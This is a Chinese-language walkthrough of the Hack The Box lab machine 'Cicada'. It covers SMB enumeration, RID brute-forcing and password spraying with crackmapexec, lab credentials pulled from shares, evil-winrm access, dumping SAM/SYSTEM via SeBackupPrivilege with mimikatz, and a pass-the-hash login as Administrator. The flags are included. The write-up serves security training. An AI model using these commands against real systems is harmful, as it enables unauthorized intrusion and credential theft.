HTB:Cicada[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行开放端口扫描

使用nmap对靶机开放端口进行脚本、服务信息扫描

首先尝试空密码连接靶机SMB服务

由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

通过该账户连接至靶机SMB服务器提取敏感信息

使用david.orelious用户凭证登录靶机SMB服务

使用evil-winrm通过上文凭证连接到靶机WinRM服务

USER_FLAG:0c79a06b429a6c9144e52201714e6328

权限提升

尝试将注册表中的SAM、SYSTEM进行读取保存

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005


连接至HTB服务器并启动靶机

靶机IP:10.10.11.35

分配IP:10.10.16.22


使用nmap对靶机进行开放端口扫描

复制代码
nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.35

将输出写入res.txt文件中,并提取端口号存入变量ports

复制代码
ports=$(cat res.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

使用nmap对靶机开放端口进行脚本、服务信息扫描

复制代码
nmap -p$ports -sCV 10.10.11.35

首先尝试空密码连接靶机SMB服务

复制代码
smbclient -L 10.10.11.35

列出HR共享中的所有文件

复制代码
smbclient -N \\\\10.10.11.35\\HR

Notice from HR.txt文件下载到本地

复制代码
get "Notice from HR.txt"

查看该文件内容

复制代码
cat 'Notice from HR.txt'

密码:Cicada$M6Corpb*@Lp#nZp!8


由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

复制代码
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'

将该输出保存到users.txt文件中,再将所有用户名进行提取

复制代码
cat users.txt | cut -f 2 -d '\' | cut -f 1 -d ' ' | tee users.txt

使用上文拿到的密码对靶机账户进行密码喷洒

复制代码
crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

由输出可见,该密码对账户michael.wrightson生效

账户:michael.wrightson

密码:Cicada$M6Corpb*@Lp#nZp!8


通过该账户连接至靶机SMB服务器提取敏感信息

复制代码
crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

账户:david.orelious

密码:aRt$Lp#7t*VQ!3


使用david.orelious用户凭证登录靶机SMB服务

复制代码
smbclient -U david.orelious //10.10.11.35/DEV

Backup_script.ps1文件下载到本地

复制代码
get Backup_script.ps1

查看该文件内容

复制代码
cat Backup_script.ps1

账户:emily.oscars

密码:Q!3@Lp#M6b*7t*Vt


使用evil-winrm通过上文凭证连接到靶机WinRM服务

复制代码
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

进入C盘根目录

复制代码
cd C:\

查找user_flag位置

复制代码
cmd.exe /c dir /s user.txt

可以看到有两个user.txt文件,两个都查看内容发现是一样的

复制代码
type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

*Evil-WinRM* PS C:\> type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"

0c79a06b429a6c9144e52201714e6328

*Evil-WinRM* PS C:\> type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

0c79a06b429a6c9144e52201714e6328

USER_FLAG:0c79a06b429a6c9144e52201714e6328


权限提升

列出所有用户组

可以看到该用户具有文件备份特权(SeBackupPrivilege)

尝试将注册表中的SAM、SYSTEM进行读取保存

复制代码
reg save hklm\sam sam
reg save hklm\system system

利用这两个注册表文件抓取靶机管理员密码

复制代码
.\mimikatz.exe "lsadump::sam /sam:sam /system:system" exit

账户:Administrator

密码:2b87e7c93a3e8a0ea4a581937016f341

利用该哈希值直接通过evil-winrm登录靶机

复制代码
evil-winrm -i 10.10.11.35 -H '2b87e7c93a3e8a0ea4a581937016f341' -u 'Administrator'

进入C盘根目录下

复制代码
cd C:\

查找root_flag位置

复制代码
cmd.exe /c dir /s root.txt

查看root_flag内容

复制代码
type "C:\Users\Administrator\Desktop\root.txt"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\

*Evil-WinRM* PS C:\> cmd.exe /c dir /s root.txt

Volume in drive C has no label.

Volume Serial Number is 1B60-8905

Directory of C:\Documents and Settings\Administrator\Desktop

10/30/2024 04:30 PM 34 root.txt

1 File(s) 34 bytes

Directory of C:\Users\Administrator\Desktop

10/30/2024 04:30 PM 34 root.txt

1 File(s) 34 bytes

Total Files Listed:

2 File(s) 68 bytes

0 Dir(s) 1,663,627,264 bytes free

*Evil-WinRM* PS C:\> type "C:\Users\Administrator\Desktop\root.txt"

b7c206ec1a5f03f4de21e622502f4005

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005

相关推荐
小红卒4 小时前
upload-labs靶场通关详解:第21关 数组绕过
web安全·网络安全·文件上传漏洞
kp0000010 小时前
GitHub信息收集
web安全·网络安全·信息收集
LuDvei15 小时前
CH9121T电路及配置详解
服务器·嵌入式硬件·物联网·网络协议·tcp/ip·网络安全·信号处理
山川绿水19 小时前
Ubuntu22.04更新Openssh至9.9p2无法正常连接,报错解决
服务器·web安全·网络安全
武汉唯众智创1 天前
网络安全实训室建设方案全攻略
网络·安全·web安全·网络安全·网络安全实训室·网络安全实验室
宝山哥哥1 天前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全
在安全厂商修设备2 天前
SQL注入与防御-第六章-3:利用操作系统--巩固访问
sql·web安全·网络安全
情分丶2 天前
中国蚁剑使用方法
网络安全
王天天(Bennet)2 天前
【防火墙基础之传统墙到 UTM 到 NGFW 再到 AI 的变化】
人工智能·网络安全·防火墙·ngfw·防火墙发展与认知
2501_916008892 天前
iOS App抓包工具排查后台唤醒引发请求异常
websocket·网络协议·tcp/ip·http·网络安全·https·udp